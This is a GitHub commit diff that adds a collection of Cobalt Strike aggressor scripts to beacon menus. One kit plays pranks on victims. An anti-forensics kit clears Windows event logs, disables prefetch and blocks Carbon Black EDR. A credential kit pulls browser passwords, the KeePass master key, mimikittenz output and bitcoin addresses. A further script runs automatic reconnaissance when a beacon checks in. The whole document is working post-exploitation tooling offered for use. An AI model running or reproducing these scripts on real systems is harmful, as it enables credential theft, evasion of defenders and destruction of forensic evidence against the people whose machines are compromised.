added collection of other peoples cna scripts found on github

johnnyDEP · May 5, 2017 · b9d5507 · b9d5507
1 parent 8d50d47
commit b9d5507
Show file tree

Hide file tree

Showing 35 changed files with 4,102 additions and 0 deletions.
diff --git a/AnnoyKit.cna b/AnnoyKit.cna
@@ -0,0 +1,50 @@
+# Actions in this kit center around miscellaneous fun thta generally involve messing with the user
+# @Und3rf10w
+
+popup beacon_bottom {
+	menu "AnnoyKit" {
+		item "Open Hidden Internet Explorer" {
+			local('$bid');
+			foreach $bid ($1){
+				binput($1, "powershell-import Open-HiddenInternetExplorer.ps1");
+				bpowershell_import($1, script_resource("AnnoyKit/scripts/Open-HiddenInternetExplorer.ps1"));
+				prompt_text("URL to open?", "https://www.youtube.com/watch?v=wZZ7oFKsKzY", {
+					$videoURL = $1;
+					return $videoURL;
+				});
+				binput($1, "powershell Open-HiddenInternetExplorer $videoURL ");
+				bpowershell($1, "Open-HiddenInternetExplorer $videoURL ");
+			}
+		}
+		# Credit goes to SadProcessor for these scripts!
+		menu "Play chiptunes" {
+			item "Play Imperial March" {
+				local('$bid');
+				foreach $bid ($1){
+					binput($1, "powershell-import Play-ImperialMarch.ps1");
+					bpowershell_import($1, script_resource("AnnoyKit/scripts/annoySongs/Play-ImperialMarch.ps1"));
+					binput($1, "powershell Play-ImperialMarch");
+					bpowershell($1, "Play-ImperialMarch");
+				}
+			}
+			item "Play Rickroll" {
+				local('$bid');
+				foreach $bid ($1){
+					binput($1, "powershell-import Play-RickAstley.ps1");
+					bpowershell_import($1, script_resource("AnnoyKit/scripts/annoySongs/Play-RickAstley.ps1"));
+					binput($1, "powershell Play-RickAstely");
+					bpowershell($1, "Play-RickAstely");
+				}
+			}
+			item "Play Tetris Theme" {
+				local('$bid');
+				foreach $bid ($1){
+					binput($1, "powershell-import Play-TetrisTune.ps1");
+					bpowershell_import($1, script_resource("AnnoyKit/scripts/annoySongs/Play-TetrisTune.ps1"));
+					binput($1, "powershell Play-TetrisTune");
+					bpowershell($1, "Play-TetrisTune");
+				}
+			}
+		}
+	}
+}
diff --git a/AntiForensicsKit.cna b/AntiForensicsKit.cna
@@ -0,0 +1,67 @@
+# Actions in this kit center around antiforensics. If it slows an investigator down, it likely belongs in this kit. We all know antiforensics is best forensics
+# @Und3rf10w
+
+popup beacon_bottom {
+	menu "AntiForensicsKit" {
+		item "Clear System Event Logs (psh)"{
+			local('$bid');
+			foreach $bid ($1){
+				binput($1, "powershell gcim -CimSession $CimSession -ClassName Win32_NTEventlogFile | icim -MethodName ClearEventLog");
+				bpowershell($1, "gcim -CimSession $CimSession -ClassName Win32_NTEventlogFile | icim -MethodName ClearEventLog");
+			}
+		}
+		item "Stop Windows Event Collector svc"{
+			local('$bid');
+			foreach $bid ($1){
+				binput($1, "sc stop wecsvc");
+				bshell($1, "sc stop wecsvc");
+			}
+		}
+		item "Check VM" {
+			local('$bid');
+			foreach $bid ($1){
+				binput($1, "powershell-import Check-VM.ps1");
+				bpowershell_import($1, script_resource("AntiForensicsKit/scripts/Check-VM.ps1"));
+				binput($1, "powershell Check-VM");
+				bpowershell($1, "Check-VM");
+			}
+		}
+		menu "Prefetch Management" {
+			item "Disable Prefetch" {
+				local('$bid');
+				foreach $bid ($1) {
+					bshell($bid,'REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session\Memory Management\PrefetchParameters" /V "EnablePrefetcher" /t REG_DWORD /F /D "0"');
+					bshell($bid,'REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session\Memory Management\PrefetchParameters" /V "EnableSuperfetcher" /t REG_DWORD /F /D "0"');
+					#bshell($1,'net stop eventlog /f');
+				}
+			}
+			item "Enable Prefetch" {
+					local('$bid');
+					foreach $bid ($1) {
+						bshell($bid,'REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session\Memory Management\PrefetchParameters" /V "EnablePrefetcher" /t REG_DWORD /F /D "3"');
+						bshell($bid,'REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session\Memory Management\PrefetchParameters" /V "EnableSuperfetcher" /t REG_DWORD /F /D "1"');
+				}
+			}
+		}
+		menu "Carbon Black" {
+			item "Block Carbon Black (<= 7.2.3P2)"{
+				local('$bid');
+				foreach $bid ($1) {
+					openOrActivate($bid);
+					bpowershell_import($bid, script_resource("AntiForensicsKit/scripts/Block-CarbonBlack.ps1"));
+					binput($bid, "powershell Block-CarbonBlack");
+					bpowershell($bid, "Block-CarbonBlack");
+				}
+			}
+			item "Restore Carbon Black"{
+				local('$bid');
+				foreach $bid ($1) {
+					openOrActivate($bid);
+					bpowershell_import($bid, script_resource("AntiForensicsKit/scripts/Block-CarbonBlack.ps1"));
+					binput($bid, "powershell Restore-CarbonBlack");
+					bpowershell($bid, "Restore-CarbonBlack");
+				}
+			}
+		}
+	}
+}
diff --git a/CredKit.cna b/CredKit.cna
@@ -0,0 +1,76 @@
+# Actions in this kit center around credential theft, be it via memory scraping or reading files in. If it involves stealing passwords, it should be here.
+# @Und3rf10w
+
+popup beacon_bottom {
+	menu "CredKit" {
+		item "Get Firefox Passwords"{
+			local('$bid');
+			foreach $bid ($1){
+				binput($1, "powershell-import Get-FirefoxPasswords.ps1");
+				# read in the powershell script
+				$handle = openf(script_resource("CredKit/scripts/Get-FirefoxPasswords.ps1"));
+				$firefox_script = readb($handle, -1);
+				closef($handle);
+				# host firefox script on beacon
+				$cmd = beacon_host_script($1, $firefox_script);
+				binput($bid, "powershell Get-FirefoxPasswords");
+				sleep(5 * 1000);
+				# execute in-memory hosted script
+				bpowerpick($1, "$cmd");
+			}
+		}
+		item "Get Chrome Passwords"{
+			local('$bid');
+			foreach $bid ($1){
+				binput($1, "powershell-import Get-ChromePasswords.ps1");
+				# read in the powershell script
+				$handle = openf(script_resource("CredKit/scripts/Get-ChromePasswords.ps1"));
+				$chrome_script = readb($handle, -1);
+				closef($handle);
+				$cmd = beacon_host_script($bid, $chrome_script);
+				binput($bid, "powerpick Get-ChromePasswords");
+				sleep(50 * 1000);
+				# execute in-memory hosted script
+				bpowerpick($bid, "$cmd");
+			}
+		}
+		item "Find KeePass Config"{
+			local('$bid');
+			foreach $bid ($1) {
+				binput($1, "powershell-import KeePassConfig.ps1");
+				bpowershell_import($bid, script_resource("CredKit/scripts/KeePassConfig.ps1"));
+				binput($bid, "powershell Find-KeePassconfig");
+				bpowershell($bid, "Find-KeePassconfig");
+			}
+		}
+		item "Get KeePass database master key"{
+			local('$bid');
+			foreach $bid ($1) {
+				binput($bid, "powershell-import KeeThief.ps1");
+				bpowershell_import($bid, script_resource("CredKit/scripts/KeeThief.ps1"));
+				binput($bid, "powershell Get-KeePassDatabaseKey -Verbose");
+				bpowershell($bid, "Get-KeePassDatabaseKey -Verbose");
+			}
+		}
+		item "Invoke-mimikittenz"{
+			local('$bid');
+			foreach $bid ($1) {
+				binput($bid, "powershell-import Invoke-mimikittenz.ps1");
+				bpowershell_import($bid, script_resource("CredKit/scripts/Invoke-mimikittenz.ps1"));
+				binput($bid, "powershell Invoke-mimikittenz");
+				bpowershell($bid, "Invoke-mimikittenz");
+			}
+		}
+	}
+}
+
+popup ssh {
+	menu "CredKit" {
+		item "Find bitcoin addresses"{
+			local('$bid');
+			foreach $bid ($1){
+				bshell($1, 'egrep "^[13][a-km-zA-HJ-NP-Z0-9]{26,33}$" / -R 2>/dev/null');
+			}
+		}
+	}
+}
diff --git a/DNS_SA.cna b/DNS_SA.cna
@@ -0,0 +1,32 @@
+on beacon_initial_empty {
+
+# checkin, sleep to 0s, list pwd	
+	binput($1, "checkin");
+	bcheckin($1);
+	bsleep($1, 0, 0);
+	bmode($1, "dns-txt");	
+	bpwd($1);
+
+#list user groups 
+	bshell($1, "whoami /all");
+
+#list user info 
+	bshell($1, "net users %username% /domain");
+	bshell($1, "net localgroup administrators");
+
+#list network info 
+	bshell($1, "ipconfig /all");
+	bshell($1, "netstat -ano");
+	bshell($1, "arp -A");
+
+#list shares 
+	bshell($1, "net use");
+
+#list sysinfo and process list
+	bshell($1, "systeminfo");
+	bps($1);
+
+#reset sleep
+	bsleep($1, 5, 30);
+
+}